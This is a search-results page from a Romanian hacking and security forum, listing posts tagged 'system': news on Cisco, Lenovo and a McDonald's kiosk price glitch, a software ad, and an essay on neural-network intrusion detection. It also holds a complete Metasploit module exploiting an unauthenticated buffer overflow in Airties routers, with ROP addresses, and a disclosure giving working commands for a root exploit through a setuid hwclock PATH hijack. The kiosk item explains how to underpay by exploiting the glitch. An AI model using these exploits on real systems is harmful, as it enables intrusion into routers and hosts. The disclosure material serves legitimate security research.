Jump to content

Search the Community

Showing results for tags 'system'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

  1. Buna ziua fac o cerere catre comunitate cine ar putea sa imi dea system.img file pentru allview a5 smiley sau cine are sistemul de operare ubuntu/linux sa ma ajute sa fac procedura repack pt folderul System P.S Am nevoie de fisierul system.img pentru Sp Flash Tool Sau cum pot flashui Fodelrul System pe un device fara System Img P.S Sau cum pot extrage system.img de pe un telefon UNROOT( CWM recovery installed)
  2. Product Description We all like fast and secure computers, but only constant system maintenance and time-consuming optimizations will keep them that way. Those of us who like to invest time and effort to keep up with the latest developments may very well handle those tasks using default Windows tools alone. As system experts, they love to accelerate their machines, protect their privacy, clean and backup system files, fix common Windows errors any perform many other tasks. This not only sounds like a lot of work, it is! Our WinOptimizer will do the work for you, easy, fast and efficiently. It will give you maximum performance and security and save you precious time so you can get real work done instead. Ashampoo WinOptimizer 11 … … frees space Make orphaned files, program remains and temporary files disappear and delete no longer needed documents irrevocably. Find duplicate files and track down resource hogs. Reclaim your disk space! … fixes errors Clean your Windows Registry, fix file system errors and monitor the health of your disk drives. Just say No to Windows errors! … guarantees steady performance Use the powerful Live Tuner to auto-tune your applications for maximum speed and optimize your Internet connection. Get more performance out of your PC! … protects your privacy Wipe all Internet traces from your system and encrypt sensitive data safely. Now, you decide what information is automatically sent to Microsoft on a regular basis. Protect yourself against prying eyes! … customizes Windows to your needs Adjust hidden system settings, alter file type associations or adjust context menu entries easily. More flexibility for you! More power under the hood Ashampoo WinOptimizer 11 not only provides extensive system details but it is also the fastest WinOptimizer ever. Completely redeveloped core algorithms and radical program code optimization make it a screamer. Live Tuner 2.0 – More efficient, more effective, more versatile With brand-new algorithms, Live Tuner can accelerate applications more effectively while using less memory resources. Options for rule-based tuning have also been greatly enhanced. Game Booster – Turbo for gamers Game Booster gives you excellent gaming performance at the click of a button. All non-essential Windows processes will automatically be shut down and memory freed. Perfect gaming conditions instantly. User Rights Manager – Have it your way Discover the easiest way to define which actions, settings or applications can happen on your machine. For example, prevent your kids from installing programs, altering critical system settings or launching unsuitable applications. Faster, leaner, more efficient Ashampoo WinOptimizer 11 starts up faster and requires less memory. This is especially true for Live Tuner that can now optimize application processes more efficiently. The detection rate for all cleaners has been increased and the integrated backup system now supports incremental backups for modified system files. Get more out of your PC and get Ashampoo WinOptimizer 11 – the tuning specialist for your PC. -> Download <-Deal Expires in: EXPIRED! Grab 50% Discount Coupon on Ashampoo WinOptimizer 11 With Free Updates. Click Here.
  3. Viral Facebook post shows how buyers can get meals at half the price from McDonald’s Self-Serving exploiting a system glitch Customers in Australia were treated to a 50% discount meal due to a glitch in the self-service system at a McDonald’s unit. The fault could be made full use of straight from the menu option. Had someone not posted a video on Facebook explaining the steps to get the price cut, probably McDonald’s would have taken some time to find the fault. Max Jalal shared the mobile phone footage showing how he and his group of friends get a family value Dinner Box that usually costs $19.95 / €17.50 for just $9.95 / €8.80 by doing nothing but using the self-serve tills. Jalal suggests going with the option to pay at the counter instead of the machine, in order to keep the employees unaware of the trick. Max Jalal selects a $20 dinner box, then his friend doing the filming, is heard saying: “This is the best bit, watch this.” He then selects an L and P option from the drinks menu and adds it to his bill, but it reduces the total price down to $17.20. He then repeats this step three more times until the total is reduced to less than half. The option is easy to locate as it shows no image of a product or price. Jalal’s bill was half the original value after repeating this step four times. It seemed like like the glitch could not be exploited further than this. The video clip was shot in a branch of the fast-food retailer in Melbourne, Australia. As expected, the Facebook post went viral and managed to garner a lot of attention. The video clip was viewed by more than 1.5 million people after it was posted to Facebook and shared. Self-service systems have been available in other parts of the world for years, but it is not clear if this process has the same effect on them too. The machine at the respective location has been fixed by McDonald’s Australia and the machine should now work as it is meant to be. It looks apparently that this was an exceptional case. A McDonald’s spokesman speaking to Daily Mail Australia said: “It is a new computer system and the nature of computer systems mean sometimes glitches can happen.” He added he was “fairly confident” there weren’t any other faults in the system that would let people to reduce the price of their meal. Source
  4. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => 'Airties login-cgi Buffer Overflow', 'Description' => %q{ This module exploits a remote buffer overflow vulnerability on several Airties routers. The vulnerability exists in the handling of HTTP queries to the login cgi with long redirect parameters. The vulnerability doesn't require authentication. This module has been tested successfully on the AirTies_Air5650v3TT_FW_1.0.2.0.bin firmware with emulation. Other versions such as the Air6372, Air5760, Air5750, Air5650TT, Air5453, Air5444TT, Air5443, Air5442, Air5343, Air5342, Air5341, Air5021 are also reported as vulnerable. }, 'Author' => [ 'Batuhan Burakcin <batuhan[at]bmicrosystems.com>', # discovered the vulnerability 'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module ], 'License' => MSF_LICENSE, 'Platform' => ['linux'], 'Arch' => ARCH_MIPSBE, 'References' => [ ['EDB', '36577'], ['URL', 'http://www.bmicrosystems.com/blog/exploiting-the-airties-air-series/'], #advisory ['URL', 'http://www.bmicrosystems.com/exploits/airties5650tt.txt'] #PoC ], 'Targets' => [ [ 'AirTies_Air5650v3TT_FW_1.0.2.0', { 'Offset' => 359, 'LibcBase' => 0x2aad1000, 'RestoreReg' => 0x0003FE20, # restore s-registers 'System' => 0x0003edff, # address of system-1 'CalcSystem' => 0x000111EC, # calculate the correct address of system 'CallSystem' => 0x00041C10, # call our system 'PrepareSystem' => 0x000215b8 # prepare $a0 for our system call } ] ], 'DisclosureDate' => 'Mar 31 2015', 'DefaultTarget' => 0)) deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR') end def check begin res = send_request_cgi({ 'uri' => '/cgi-bin/login', 'method' => 'GET' }) if res && [200, 301, 302].include?(res.code) && res.body.to_s =~ /login.html\?ErrorCode=2/ return Exploit::CheckCode::Detected end rescue ::Rex::ConnectionError return Exploit::CheckCode::Unknown end Exploit::CheckCode::Unknown end def exploit print_status("#{peer} - Accessing the vulnerable URL...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL") end print_status("#{peer} - Exploiting...") execute_cmdstager( :flavor => :echo, :linemax => 100 ) end def prepare_shellcode(cmd) shellcode = rand_text_alpha_upper(target['Offset']) # padding shellcode << [target['LibcBase'] + target['RestoreReg']].pack("N") # restore registers with controlled values # 0003FE20 lw $ra, 0x48+var_4($sp) # 0003FE24 lw $s7, 0x48+var_8($sp) # 0003FE28 lw $s6, 0x48+var_C($sp) # 0003FE2C lw $s5, 0x48+var_10($sp) # 0003FE30 lw $s4, 0x48+var_14($sp) # 0003FE34 lw $s3, 0x48+var_18($sp) # 0003FE38 lw $s2, 0x48+var_1C($sp) # 0003FE3C lw $s1, 0x48+var_20($sp) # 0003FE40 lw $s0, 0x48+var_24($sp) # 0003FE44 jr $ra # 0003FE48 addiu $sp, 0x48 shellcode << rand_text_alpha_upper(36) # padding shellcode << [target['LibcBase'] + target['System']].pack('N') # s0 - system address-1 shellcode << rand_text_alpha_upper(16) # unused registers $s1 - $s4 shellcode << [target['LibcBase'] + target['CallSystem']].pack('N') # $s5 - call system # 00041C10 move $t9, $s0 # 00041C14 jalr $t9 # 00041C18 nop shellcode << rand_text_alpha_upper(8) # unused registers $s6 - $s7 shellcode << [target['LibcBase'] + target['PrepareSystem']].pack('N') # write sp to $a0 -> parameter for call to system # 000215B8 addiu $a0, $sp, 0x20 # 000215BC lw $ra, 0x1C($sp) # 000215C0 jr $ra # 000215C4 addiu $sp, 0x20 shellcode << rand_text_alpha_upper(28) # padding shellcode << [target['LibcBase'] + target['CalcSystem']].pack('N') # add 1 to s0 (calculate system address) # 000111EC move $t9, $s5 # 000111F0 jalr $t9 # 000111F4 addiu $s0, 1 shellcode << cmd end def execute_command(cmd, opts) shellcode = prepare_shellcode(cmd) begin res = send_request_cgi({ 'method' => 'POST', 'uri' => '/cgi-bin/login', 'encode_params' => false, 'vars_post' => { 'redirect' => shellcode, 'user' => rand_text_alpha(5), 'password' => rand_text_alpha(8) } }) return res rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") end end end Source
  5. Hello, During a recent assessment I have stumbled across a system which had hwclock(8) setuid root hwclock is a part of util-linux, all versions affected $ man hwclock | sed -n '223,231p' Users access and setuid Sometimes, you need to install hwclock setuid root. If you want users other than the superuser to be able to display the clock value using the direct ISA I/O method, install it setuid root. If you have the /dev/rtc interface on your system or are on a non-ISA system, there's probably no need for users to use the direct ISA I/O method, so don't bother. In any case, hwclock will not allow you to set anything unless you have the superuser real uid. (This is restriction is not necessary if you haven't installed setuid root, but it's there for now). http://sources.debian.net/src/util-linux/2.26.2-5/sys-utils/hwclock.c/#L2041 "The program is designed to run setuid superuser, since we need to be able to do direct I/O. (More to the point: we need permission to execute the iopl() system call). (However, if you use one of the methods other than direct ISA I/O to access the clock, no setuid is required)." http://sources.debian.net/src/util-linux/2.26.2-5/sys-utils/hwclock.c/#L1920 "program is designed to run setuid (in some situations)" Some comments in code and unfortunately also man page advertising that setuid is no problem. That's pretty stupid promise. from util-linux/2.26.2-5/sys-utils/hwclock.c http://sources.debian.net/src/util-linux/2.26.2-5/sys-utils/hwclock.c/#L748 /* Quotes in date_opt would ruin the date command we construct. */ if (strchr(date_opt, '"') != NULL) { warnx(_ ("The value of the --date option is not a valid date.\n" "In particular, it contains quotation marks.")); return 12; } sprintf(date_command, "date --date=\"%s\" +seconds-into-epoch=%%s", date_opt); [...] date_child_fp = popen(date_command, "r"); [...] hwclock uses popen() to date_command which is 'date --date=\"%s\" +seconds-into-epoch=%%s' Exploiting is trivial, since $PATH is user-controlled $ ls -l /usr/sbin/hwclock -rwsr-sr-x. 1 root root 48096 Nov 27 14:10 /usr/sbin/hwclock $ cat > date.c;gcc date.c -o date main() { chown("/tmp/sploit", 0, 0); chmod("/tmp/sploit", 04755); } ^D $ cp /bin/sh /tmp/sploit $ PATH=".:$PATH" /usr/sbin/hwclock --set --date="05/23/2015 20:35:37" hwclock: The date command issued by hwclock returned unexpected results. The command was: date --date="05/23/2015 20:35:37" +seconds-into-epoch=%s The response was: hwclock: No usable set-to time. Cannot set clock. $ /tmp/sploit # id euid=0(root) groups=0(root) *Insert CVE Request here* Notes: Please note that this is possible on Debian-derived (and therefore Ubuntu), because /bin/sh is provided by dash which does NOT make use of privmode (does not drop privileges if ruid != euid, unlike bash), which is a very stupid idea. privmode is surprisingly effective at mitigating some common vulnerability classes and misconfigurations, and it has been around since mid 90's. Indeed, Chet Ramey (bash author and maintainer) explains that the purpose of this is to prevent "bogus system(3)/popen(3) calls in setuid executables" TL;DR: When setuid root, hwclock relies on $PATH to popen() the date command, meaning privilege escalation can occur since $PATH is user-controlled. Patches are available, signed off by Karel Zak <kzak@redhat.com> https://github.com/karelzak/util-linux/commit/687cc5d58942b24a9f4013c68876d8cbea907ab1 Initial bug report: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=786804 Thanks, Federico Bento. ---------------------------------------------------------------- This message was sent using IMP, the Internet Messaging Program. Source: http://dl.packetstormsecurity.net/1505-exploits/hwclock-escalate.txt
  6. Cisco has patched a remote code execution bug that could give attackers root privileges on its Unified Computing System (UCS) Central software used by more than 30,00 organisations. The UCS data centre server platform joins hardware, virtualisation, networking and software into one system. Versions 1.2 and below are affected. The Borg says the vulnerability (CVE-2015-0701) rates the maximum 10 severity rating due to its low exploitation requirements and "complete" impact to confidentiality, integrity and availability. "A vulnerability in the web framework of Cisco UCS Central Software could allow an unauthenticated, remote attacker to execute arbitrary commands on an affected device," it says in an advisory. "The vulnerability is due to improper input validation. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. An exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the privileges of the root user." The Borg says patches for the bug are available but warns there are no workarounds. <pSuccessful exploitation of the problem would grant unauthenticated access to sensitive information, allow arbitrary command execution on UCS boxes' operating systems, or create denial of service conditions. Happily, no attacks using the flaw have been spotted in the wild. Source
  7. Salutare, am revenit cu o stire interesanta si anume securitatea celor de la Lenovo scartaie. O noua problema de securitate a fost descoperita zilele trecute, mai bine acuma decat niciodata. Compania Lenovo a fost acuzat? c? ar avea probleme mari în ceea ce prive?te securitatea, din cauza vulnerabilit??ilor din serviciul de actualizare online. Asta dup? scandalul Superfish de la începutul anului. Se pare c? din cauza actualelor vulnerabilit??i, hackerii pot desc?rca programe periculoase în sistemele utilizatorilor printr-un atac de tip MITM (man-in-the-middle). Lenovo a preinstalat pe mai mult computere., între septembrie 2014 ?i ianuarie 2015, o aplica?ie de tip adware care a expus utilizatorii la riscuri majore de securitate. Superfish era capabil ?i s? înlocuiasc? certificatele SSL ale sistemului, reducând la zero securitate oferit? de conexiunile HTTPS. Problemele au fost ar?tate de firma de securitate IOActive, la câteva s?pt?mâni dup? ce s-a aflat c? Lenovo distribuia computere cu Superfish preinstalat. Cercet?torii au descoperit vulnerabilit??ile în februarie, dar le-au oferit celor de la Lenovo ocazia de a le repara, înainte de a le face publice, noteaz? SC Magazine. Una dintre vulnerabilit??i, CVE-2015-2233, permite hackerilor s? treac? de verific?rile validit??ii semn?turii ?i s? înlocuiasc? aplica?ii Lenovo cu software-uri r?u inten?ionate. CVE-2015-2219, alt bug, permite accesul ?i rularea programelor ?i comenzilor mali?ioase. O alt? sl?biciune, CVE-2015-2234, permite efectuarea comenzilor pe care, în mod normal, doar administratorul de sistem le poate da. Sofiane Talmat, consultant în securitate pentru IOActive, a confirmat pentru SCMagazine c? Lenovo a rezolvat problemele, dar c? utilizatorii trebuie s? descarce ultima versiune a Lenovo System Update pentru a fi siguri. Actualizare Acest articol a fost completat cu declara?ia oficial? a celor de la Lenovo: “Echipele Lenovo de dezvoltare ?i securitate au colaborat în mod direct cu IOActive referitor la vulnerabilit??ile aplica?iei System Update depistate de ace?tia din urm? ?i apreciem expertiza acestora pentru identificarea ?i raportarea lor cu responsabilitate. Lenovo a lansat pe 1 aprilie o versiune actualizat? a aplica?iei System Update care solu?ioneaz? aceste vulnerabilit??i. Am publicat ulterior, in colaborare cu IOActive, o not? de securitate, disponibil? aici. În situa?ia în care aplica?ia System Update a fost deja instalat?, utilizatorului i se cere s? instaleze versiunea actualizat? de îndat? ce aplica?ia ruleaz?. Ca solu?ie alternativ?, utilizatorii pot actualiza manual System Update, urmând pa?ii descri?i în nota de securitate. Lenovo recomand? tuturor utilizatorilor s? actualizeze aplica?ia System Update pentru a elimina vulnerabilit??ile raportate de IOActive. În general, Lenovo recomand? utilizatorilor s?i s? permit? actualizarea automat? a sistemelor, pentru a avea în permanen?? acces la cele mai nou software disponibil.” Multumesc pentru timpul acordat!
  8. Intrusion systems have been the subject of considerable research for decades to improve the inconsistencies and inadequacies of existing methods, from basic detectability of an attack to the prevention of computer misuse. It remains a challenge still today to detect and classify known and unknown malicious network activities through identification of intrusive behavioral patterns (anomaly detection) or pattern matching (misuse or signature-based detection). Meanwhile, the number of network attack incidents continues to grow. Protecting a computer network against attacks or cybersecurity threats is imperative, especially for companies that need to protect not only their own business data but also sensitive information of their clients as well as of their employees. It is not hard to see why even just one breach in data security from a single intrusion of a computer network could wreak havoc on the entire organization. Not only would it question the reliability of the networks’ infrastructure, but it could also seriously damage the business’s reputation. An organization’s first defense against breaches is a well-defined corporate policy and management of systems, as well as the involvement of users in protecting the confidentiality, integrity, and availability of all information assets. Security awareness training is a baseline for staff to gain the knowledge necessary to deter computer breaches and viruses, mitigate the risks associated with malicious attacks, and defend against constantly evolving threats. Users’ awareness and strict IT policies and procedures can help defend a company from attacks, but when a malicious intrusion is attempted, technology is what helps systems administrators protect IT assets. When it comes to perimeter data security, traditional defense mechanisms should be in layers: firewalls, intrusion detection systems (IDS) and intrusion prevention systems (IPS) can be used. Research and new developments in the field of IDPS (Intrusion Detection and Prevention System) prove different approaches to anomaly and misuse detection can work effectively in practical settings, even without the need of human interaction/supervision in the process. Several case studies emphasize that the use of Artificial Neural Networks (ANN) can establish general patterns and identify attack characteristics in situations where rules are not known. A neural network approach can adapt to certain constraints, learn system characteristics, recognize patterns and compare recent user actions to the usual behavior; this allows resolving many issues/problems even without human intervention. The technology promises to detect misuse and improve the recognition of malicious events with more consistency. A neural network is able to detect any instances of possible misuse, allowing system administrators to protect their entire organization through enhanced resilience against threats. This article explores Artificial Intelligence (AI) as a means to solve the difficulties in identifying intrusions of insecure networks, such as the Internet, and discusses the use of artificial neural networks (ANN) for effective intrusion detection to detect patterns that separate attacks from genuine traffic. It will clarify why ANN technology offers a promising future in the identification of instances of misuse against computer systems. Furthermore, the article will also point out the different directions in which research on neural networks concentrate and the developments and expected future in the intrusion detection and prevention (IDPS) field. IDS & IPS Technology: Detection and Prevention Techniques With computer intrusions—the unauthorized access or malicious use of information resources—becoming more common and a growing challenge to overcome, IT professionals have come to rely more on detection and prevention technologies to protect availability of business-critical information resources and to safeguard data confidentiality and integrity. IDS tools sniff network packet traffic in search of interferences from external sources and can spot a hacker attempting to gain entry; they are designed to detect threats, misuse or unauthorized access to a system or network and are able to analyze system events for signs of incidents. Using both hardware and software, IDSs can detect anything that is suspicious either on a network or host; they then create alarms that system administrators can review to spot possible malicious entries. Intrusion detection systems (IDS) can be classified as: Host based or Network based with the former checking individual machines’ logs and the latter analyzing the content of network packets; Online or Offline, capable of flagging a threat in real-time or after the fact to alert of a problem; Misuse-based or Anomaly-based, either specifically checking a deviation from a routine behavior or comparing activities with normal, known attackers’ behavior. While an IDS is designed to detect attacks and alert humans to any malicious events to investigate, an IPS is used to prevent malicious acts or block suspicious traffic on the network. There are four different types of IPS: network-based intrusion prevention system (NIPS) that looks at the protocol activity to spot suspicious traffic; wireless intrusion prevention system (WIPS) that analyzes wireless networking protocols and is so important in the BYOD and mobile-centric world; network behavior analysis (NBA) that can spot attacks that create unusual traffic, such as distributed denial of service (DDoS) attacks, and it can use anomaly-based detection and stateful protocol analysis; and host-based intrusion prevention system (HIPS) that can be installed on single machines and can use signature-based and anomaly-based methods to detect problems. IDS and IPS tools are often used concurrently, as they are not mutually exclusive. Thus IDPS can offer twice the protection. Security technologist and chief technology officer of Co3 Systems Bruce Schneier mentions, “Good security is a combination of protection, detection, and response.” That just happens to be what IDPS does; it is deployed for information gathering, logging, detection and prevention. These tools provide threat identification capabilities, attack anticipation, and more. Having a network-based IDPS (NIDPS) with signature-based and anomaly-based detection capabilities allows inspecting the content of all the traffic that traverses the network. NIDPS are essential network security appliances that help in maintaining the security goals. They are highly used, as Indraneel Mukhopadhyay explains, for “identifying possible incidents, logging information about them, attempting to stop them, and reporting them to security administrators.” The all familiar Snort—an open-source NIDPS—is a highly used free threat intelligence program, created by Martin Roesch in 1998, that is capable of real-time traffic analysis and packet logging; it utilizes a rules-based detection engine to look for anomalous activity. What makes it a popular choice is its easy-to-use rule language. It can protect even the largest enterprise networks. Snort is an IP-centric program; administrators can view system security logs and find any irregularities or issues relating to things such as improper access patterns. Snort is said to be the most widely deployed intrusion prevention system in the world. Deploying IDS and IPS devices requires a specialized skill set to ensure it properly identifies abnormal traffic and alert network administrator as needed. Along with proper configuration to a predefined rule set, provided by the administrator, these devices need to be fine-tuned (as new threats are discovered) in order to weed out false positives and be adjusted to specific network parameters (when the infrastructure has been altered) to maximize accuracy. Once the type of IDPS technology has been selected, it is key to determine how many components (sensors, agents) will need to be deployed to function accurately to capture security issues, process events and alert appropriate personnel of suspicious activities. Direct network monitoring of the IDPS components like inline sensors between the firewall and the Internet border router is essential to achieve detection and prevention of malicious activity, such as denial of service attacks committed by an intruder. IDPS agents installed on endpoints can not only monitor the current network but also can assign appropriate priorities to alerts. Past and Present of IDSs IDPSs are able to monitor the events of interests on the systems and/or networks and are then able to identify possible incidents, log information about them, and attempt to stop common attacks and report them to security administrators. In the past, Intrusion Detection and Prevention (IDPS) has either been signature-based (able to check activity against known attackers’ patterns, the signature), anomaly-based (also referred to as heuristic, that alerts when traffic and activity are not normal), or based on stateful protocol analysis that looks at the “state” in a connection and “remembers” significant events that occur. These methods are effective but do have some downfalls. IDSs are known to have two main problems: the number of alarms generated and the need for tuning. Anomaly-based detection, for example, needs training and if issues arise during the training period a malicious behavior might be “learned” as legitimate by the system; it’s also prone to many false positives. When analysis is based on rules provided by a vendor or an administrator, instead, updates must be frequent to ensure the proper functioning of the system. The number of alarms generated (many being false) can overwhelm system security managers and prevent them from quickly identifying real ones. The continuous tuning of the intrusion to detect the slightest of variances and training required in order to maintain sufficient performance remains an issue. With a growing number of intrusion events, there is the need to use innovative intrusion detection techniques for critical infrastructure network protection. Research has concentrated on Artificial Neural Networks (ANNs) that can provide a more flexible approach to intrusion prevention in terms of learning. As the need for reliable automatic IDPS builds up, for it to gain acceptance as a viable alternative, it needs to function at a sufficient level of accuracy. That is where Neural Networks and Artificial Intelligence can play an effective role in the improvement of ID systems with the ability to learn from previous episodes of intrusion to identify new types of attack with less analyst interaction with the ID itself. In fact, information system experts believe that Artificial Intelligence (AI) can provide significant improvements to IDS/IPS systems, especially in terms of effectiveness and decreased false positive/negative rates, a major issue in intrusion management. Next Generation Intrusion Detection and Prevention (IDPS) Due to a new generation of hackers that are better organized and equipped than in the past, to get past perimeter security, it is clear that a different approach is required, says Joshua Crumbaugh, lead penetration tester at Tangible Security, Inc., NagaSec. As per the DRAFT Special Publication 800-94 Revision 1, Guide to …, the Next-Generation IDPS for host and network-based deployment options will have automated identification, location, isolation, and resolution of threats in real-time. A GCN staff post, “What’s next in cybersecurity automation,” provides insight on the Enterprise Automated Security Environment (EASE) concept for “shared situational awareness in cyber-relevant time” and, with the concerted efforts of government and private sector interests, the concept may foster continuous innovation for cyberspace defense across the board. Other than EASE, the US Government has already evaluated other options to defend against cyber-attacks that mine homeland security. It pursued, for example, as a project to develop a smart network of sensors (named Einstein) to detect cyber-attacks against critical infrastructures. IPS/IDS has changed, as research shows, with AI techniques that have improved IDSs by making them capable of detecting both current and future intrusion attacks while triggering fewer false positives and negatives. New ANNIDS (Neural networks applied to IDS) techniques have been able to improve the way detection systems are trained to recognize patterns, conduct problem solving and fault diagnosis too. In today’s world, there is the need “for building high-speed, reliable, robust and scalable ANN-based network intrusion detection and prevention system that is highly useful for [humankind] and organizations,” Mukhopadhyay says. Neural network based AIs are able to discover emergent collective properties that are too complex to be noticed by either humans or other computer techniques. AI based techniques are used to classify behavior patterns of a user and an intruder in a way that minimizes false alarms from happening, explains Archit Kumar, India, an M.Tech Student, Department of CSE, in a research paper for IJARCSMS. IDS based on ANN uses algorithms that can analyze the captured data and judge whether the data is intrusion or not by means of behavioral analysis of the neural computation during both learning and recall. Although ANNIDS’ main drawbacks are lower detection precision for low-frequent attacks, and weaker detection stability in the beginning, it is a suitable solution for intrusion detection and network security, says Suresh Kashyap, an Indian research scholar at the Dr. C.V. Raman University. He adds that ANNIDS can be trained and tested by customized datasets enabling it to identify known and unknown (new) attacks with increasing accuracy when other methods fail. Current AI techniques for improving automation of the intrusion detection process are not easily deployable in real life, yet many experiments and tests have been carried out with results showing ANNs capable of detecting intrusive activity in a distributed environment to provide local “threat-level” monitoring of computer DDoS attacks before the successful completion of an intrusion. ANN s are great in terms of learning capabilities and effectiveness in capturing anomalies in activities, but also have some significant downfalls, such as, for example, the requirement of high computational resources. Researchers have been working on resolving this issue by trying to find a way to help ANN systems process info faster and effectively. An approach using AI techniques combined with genetic algorithms and fuzzy logic, for instance, proved well suited for detecting malicious behavior in distributed computer systems. Research concentrated also on the possibility to clustered data in subgroups using fuzzy clustering to use then a different ANN on each set. Results are obtained faster and are then aggregated to have a complete picture. Another method explored more recently is deploying new ANN-based intelligent hybrid IDS models for anomaly detection that involve network- and host-based technologies under a single management console. These are also applicable to many environments: from Grid and Cloud Computing to mobile and network computers. In such an architecture, a Distributed Intrusion Detection System (DIDS) that relies on network and host based sensors is apt to increase the efficiency of the system yielding fast results of abnormal data determined by multiple heterogeneous recognition engines and management components to solve security issues. Conclusion Whether it is through a hybrid IDS using honey pot technology and anomaly detection or artificial neural network (ANN) based IDSs techniques, it is essential to detect and prevent attacks immediately as attempted. Information security practitioners suggest organizations are confident that their security control mechanism in place are sufficient enough for the protection of computer data and programs, but apparently, as per the PwC findings from the 2014 US State of Cybercrime Survey, a good majority of them fail to assess for threats or place emphasis on prevention mechanisms. What’s more, they also lack the ability to diagnose and troubleshoot less sophisticated attacks and have yet to consider where IDS/IPS fits in their security plan. Both system solutions work together and form an integral part of a robust network defense solution. As per the annual Worldwide Infrastructure Security Report (WISR) that provides insight into the Global Threat Landscape, organizations will face even more concerns regarding APT, so they ought to step up their network security defenses with near-real-time intrusion detection to defend critical data and applications from today’s sophisticated attacks. The new reality in IT security is that network breaches are inevitable, and the ability to monitor and control access and behavior patterns and misuse relies upon intrusion detection and prevention methods to be more quickly identified and more effectively addressed. An IDS/IPS is a must-have device; an ANN model based on ESNN learning patterns and classifying intrusion data packets is an effective approach. The main advantages of the ANNs over traditional IDSs are their abilities to learn, classify, process information faster, as well as their ability of self-organization. For these reasons, Neural Networks can increase the accuracy and efficiency of IDSs and AI techniques can improve IDS/IPS effectiveness. References Brecht, D. (2010, April 15). Network Intrusion Detection Systems: a 101. Retrieved from What is a Network Intrusion Detection System (NIDS)? Compare Business Products (2014, March 18). Security: IDS vs. IPS Explained. Retrieved from Security: IDS vs. IPS Explained | Reviews, Comparisons and Buyer's Guides GCN. (2014, December 9). What’s next in cybersecurity automation. Retrieved from What’s next in cybersecurity automation -- GCN Infosecurity Magazine. (2011, October 21). Small enterprises are suffering more intrusions, survey finds. Retrieved from Small enterprises are suffering more intrusions, survey finds - Infosecurity Magazine InfoSight Inc. (n.d). Intrusion Detection (IDS) & Intrusion Prevention (IPS). Retrieved from Intrusion Detection (IDS) & Intrusion Prevention (IPS) – InfoSight Inc Kashyap, S. (2013, May). Importance of Intrusion Detection System with its Different approaches. Retrieved from http://www.ijareeie.com/upload/may/24_Importance.pdf Kumar, A. (2014, May). Intrusion detection system using Expert system (AI) and […]. Retrieved from http://www.ijarcsms.com/docs/paper/volume2/issue5/V2I5-0064.pdf Mukhopadhyay, I. (2014). Hardware Realization of Artificial Neural Network Based Intrusion Detection & Prevention System. Retrieved from http://file.scirp.org/Html/3-7800230_50045.htm Onuwa, O. (2014, November 29). Improving Network Attack Alarm System: A Proposed Hybrid Intrusion Detection System Model. Retrieved from http://www.computerscijournal.org/vol7no3/improving-network-attack-alarm-system-a-proposed-hybrid-intrusion-detection-system-model/ Saied, A. (n.d.). Artificial Neural Networks in the detection of known and unknown DDoS attacks: Proof-of-Concept. Retrieved from http://www.inf.kcl.ac.uk/staff/richard/PAAMS-WASMAS_2014.pdf Surana, S. (2014). Intrusion Detection using Fuzzy Clustering and Artificial Neural Network. Retrieved from http://www.wseas.us/e-library/conferences/2014/Gdansk/FUNAI/FUNAI-32.pdf Vieira, K. (2010, August). Intrusion Detection for Grid and Cloud Computing. Retrieved from http://www.inf.ufsc.br/~westphal/idscloud.pdf Wang, L. (n.d.). Artificial Neural Network for Anomaly Intrusion Detection. Retrieved from https://www.cs.auckland.ac.nz/courses/compsci725s2c/archive/termpapers/725wang.pdf Zakaria, O. (n.d.). Identify Features and Parameters to Devise an Accurate Intrusion Detection System Using Artificial Neural Network. Retrieved from http://www.academia.edu/2612588/Identify_Features_and_Parameters_to_Devise_an_Accurate_Intrusion_Detection_System_Using_Artificial_Neural_Network Zamani, M. (2013, December 8). Machine Learning Techniques for Intrusion Detection. Retrieved from http://arxiv.org/pdf/1312.2177.pdf Source
  9. The Zero Access trojan (Maxx++, Sierief, Crimeware) has affected millions of computers worldwide, and it is the number one cause of cyber click fraud and Bitcoin mining on the Internet. Once the trojan has been delivered into the system, it begins to download many other types of malware that can each cause a great deal of damage to an organization. The trojan’s primary infection vector is spam mail and exploits kits, but it can also be distributed by P2P file sharing services and fake cracks and keygens. The trojan is unique in the fact that it connects to a P2P botnet chain that makes it very difficult to dismantle the botnet as a whole. Zero Access is a trojan root kit that uses advanced cloaking mechanisms to evade detection and capture. It has the ability to hide itself from several types of antivirus software and its presence in the system is extremely difficult to ascertain. It leaves no trace evidence indicating a data breach, and the network communications continue to occur as from a legitimate system process. Usually the executable file will reside in the %TEMP% directory of the workstation, and the traffic to external websites will be encoded HTTP GET and POST requests. Zero Access, once in the system, can carry out a wide variety of tasks, including: Use the infected computer for click fraud and Bitcoin mining Open the door to many other types of malware infecting the system Hide itself within the system without being detected Extract victim information including name, hostname, machine name, account name, etc. Analysis Zero Access malware can be downloaded form kernelinfo.com. In 